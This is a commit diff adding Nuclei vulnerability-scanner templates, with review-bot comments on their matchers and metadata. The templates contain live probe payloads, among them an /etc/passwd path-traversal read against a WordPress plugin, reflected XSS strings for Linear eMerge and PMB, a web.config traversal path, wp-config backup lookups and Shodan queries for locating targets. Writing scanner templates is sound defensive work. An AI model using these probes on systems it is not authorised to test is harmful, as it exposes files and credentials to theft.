Projects STRLCPY scan4all Commits c8e13f02
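--- a/config/nuclei-templates/cves/2015/CVE-2015-5469.yaml
+++ b/config/nuclei-templates/cves/2015/CVE-2015-5469.yaml
@@ -0,0 +1,34 @@
+id: CVE-2015-5469
+info:
+ name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
+ author: 0x_Akoko
+ severity: high
+ description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
+ reference:
+ - https://www.openwall.com/lists/oss-security/2015/07/10/5
+ - https://www.cvedetails.com/cve/CVE-2015-5469/
+ - http://www.vapid.dhs.org/advisory.php?v=133
+ - http://www.openwall.com/lists/oss-security/2015/07/10/5
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-5469
+ cwe-id: CWE-22
+ tags: cve,cve2015,wp,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+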
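Review bot: The `reference` list names the same oss-security post twice, once as `https://www.openwall.com/lists/oss-security/2015/07/10/5` and again with the `http://` scheme; the `http://` entry can be dropped. The regex matcher has no `part`, so it relies on the default, whereas the other templates added in this commit state it; adding `part: body` under `- type: regex` makes the intent explicit. The only probe reads `/etc/passwd`, so a negative result says nothing about a Windows-hosted WordPress, and the `description` would be a good place to note that limit.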
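--- a/config/nuclei-templates/cves/2019/CVE-2019-7255.yaml
+++ b/config/nuclei-templates/cves/2019/CVE-2019-7255.yaml
@@ -0,0 +1,44 @@
+id: CVE-2019-7255
+
+info:
+ name: Linear eMerge E3 - Cross Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Linear eMerge E3-Series devices allow XSS via layout parameter.
+ reference:
+ - https://www.applied-risk.com/resources/ar-2019-005
+ - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-7255
+ - https://applied-risk.com/labs/advisories
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-7255
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.title:"eMerge"
+ verified: "true"
+ tags: emerge,xss,packetstorm,cve,cve2019,nortek
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Template : <script>alert(document.domain)</script>'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+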
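--- a/config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
@@ -12,9 +12,12 @@
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
  - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
  classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
  cve-id: CVE-2022-2383
+ cwe-id: CWE-79
  metadata:
- verified: true
+ verified: "true"
  tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
 
 requests: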
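--- a/config/nuclei-templates/cves/2022/CVE-2022-34328.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-34328.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-34328
+
+info:
+ name: PMB 7.3.10 - Cross Site Scripting
+ author: edoardottt
+ severity: medium
+ description: |
+ PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
+ reference:
+ - https://github.com/jenaye/PMB/blob/main/README.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-34328
+ - https://github.com/jenaye/PMB
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-34328
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.html:"PMB Group"
+ verified: "true"
+ tags: cve,cve2022,pmb,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "<script>alert(document.domain)</script>' target='cart_info"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+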
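--- a/config/nuclei-templates/exposed-panels/eMerge-panel.yaml
+++ b/config/nuclei-templates/exposed-panels/eMerge-panel.yaml
@@ -0,0 +1,29 @@
+id: eMerge-panel
+
+info:
+ name: Nortek Linear eMerge - Panel Detect
+ author: arafatansari
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: http.title:"eMerge"
+ tags: panel,emerge,nortek
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - '<title>(.*)Linear eMerge(.*)</title>'
+ - '/emerge.ico'
+ condition: or
+
+ - type: status
+ status:
+ - 200
+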
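Review bot: The second pattern of the regex matcher, `'/emerge.ico'`, leaves the dot unescaped and is OR-ed with the title pattern, so on its own it decides the match for any 200 response whose body contains that loose string; `'/emerge\.ico'`, or a `word` matcher for the literal, is tighter. The capture groups in `'<title>(.*)Linear eMerge(.*)</title>'` are never used, and `'<title>.*Linear eMerge.*</title>'` expresses the same check. `verified: true` is a YAML boolean here and in aws-s3-explorer.yaml, while this same commit rewrites CVE-2022-2383.yaml to the string `verified: "true"`; one form should be used throughout.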
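--- a/config/nuclei-templates/exposures/configs/web-config.yaml
+++ b/config/nuclei-templates/exposures/configs/web-config.yaml
@@ -2,14 +2,16 @@
 
 info:
  name: Web Config file
- author: Yash Anand @yashanand155
+ author: Yash Anand @yashanand155,DhiyaneshDK
  severity: info
+ reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  tags: config,exposure
 
 requests:
  - method: GET
  path:
  - '{{BaseURL}}/web.config'
+ - '{{BaseURL}}/../../web.config'
 
  matchers-condition: and
  matchers:
@@ -22,3 +24,4 @@
  - type: status
  status:
  - 200
+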
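Review bot: The added path `'{{BaseURL}}/../../web.config'` is a traversal probe, but the template keeps `severity: info` and reuses the same matchers, so a hit that needed `../` is rated like a plainly exposed file. Depending on how the request is normalised before it is sent, this path may also reach the server as `/web.config` and only duplicate the first probe; if it is meant to test traversal, it belongs in its own template with its own severity and description. `reference:` is a bare string here while the other templates in this commit use a list, i.e. `reference:` followed by `- https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json`. The word matchers sit in the skipped lines, so this is judged from the visible part of the file only.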
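--- a/config/nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml
+++ b/config/nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml
@@ -0,0 +1,31 @@
+id: aem-osgi-bundles
+
+info:
+ name: Adobe AEM Installed OSGI Bundles
+ author: dhiyaneshDk
+ severity: low
+ reference:
+ - https://www.slideshare.net/0ang3el/hacking-aem-sites
+ metadata:
+ shodan-query:
+ - http.title:"AEM Sign In"
+ - http.component:"Adobe Experience Manager"
+ tags: misconfig,aem,adobe
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/bin.tidy.infinity.json"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"jcr:primaryType":'
+ - '"jcr:uuid":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+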
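Review bot: The name and id say "Installed OSGI Bundles", but the request fetches `/bin.tidy.infinity.json` and the matcher only looks for `'"jcr:primaryType":'` and `'"jcr:uuid":'`, which reads like a JCR node dump rather than a bundle listing, and there is no `description` to settle which is meant. A `description:` line stating what a match exposes (something like `description: AEM returns the JCR tree under /bin as JSON without authentication.`, to be confirmed by the author) would let a triager judge the `low` rating. The word matcher names no `part` and nothing checks the content type, so a header matcher for `application/json` would reduce hits on HTML pages that merely quote those keys. `shodan-query` is a list here and a scalar in the other templates of this commit.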
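--- a/config/nuclei-templates/misconfiguration/aws-s3-explorer.yaml
+++ b/config/nuclei-templates/misconfiguration/aws-s3-explorer.yaml
@@ -0,0 +1,33 @@
+id: aws-s3-explorer
+
+info:
+ name: AWS S3 Explorer
+ author: DhiyaneshDk
+ severity: low
+ reference:
+ - https://www.exploit-db.com/ghdb/7967
+ metadata:
+ verified: true
+ google-dork: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
+ tags: s3,edb,misconfig,aws,amazon
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '<title>AWS S3 Explorer</title>'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+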
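--- a/config/nuclei-templates/technologies/zap-api-detect.yaml
+++ b/config/nuclei-templates/technologies/zap-api-detect.yaml
@@ -0,0 +1,23 @@
+id: zap-rest-api-detect
+
+info:
+ name: ZAP Rest API Server Running
+ author: hahwul
+ severity: info
+ reference:
+ - https://www.zaproxy.org/docs/api/
+ tags: zap,tech
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: word
+ part: response
+ words:
+ - '<title>ZAP API UI</title>'
+ - 'Welcome to the OWASP Zed Attack Proxy (ZAP)'
+ - 'Access-Control-Allow-Headers: ZAP-Header'
+ condition: or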
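Review bot: The template id `zap-rest-api-detect` does not match its file name `zap-api-detect.yaml`, whereas every other template added in this commit uses the file name as its id; `id: zap-api-detect` (or renaming the file) keeps lookups by id and by path consistent. The single matcher ORs three strings over `part: response` with no status check, so any page that quotes the welcome sentence would be reported. Since the template has no `description`, one sentence on why a reachable ZAP API matters to the owner of the host would help whoever triages the finding.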
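--- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
+++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
@@ -2,7 +2,7 @@
 
 info:
  name: WordPress wp-config Detection
- author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
+ author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess
  severity: medium
  description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
  classification:
@@ -32,6 +32,7 @@
  - '{{BaseURL}}/wp-config.php~'
  - '{{BaseURL}}/wp-config.php-backup'
  - '{{BaseURL}}/wp-config.php.orig'
+ - '{{BaseURL}}/wp-config.php_orig'
  - '{{BaseURL}}/wp-config.php.original'
  - '{{BaseURL}}/_wpeprivate/config.json'
 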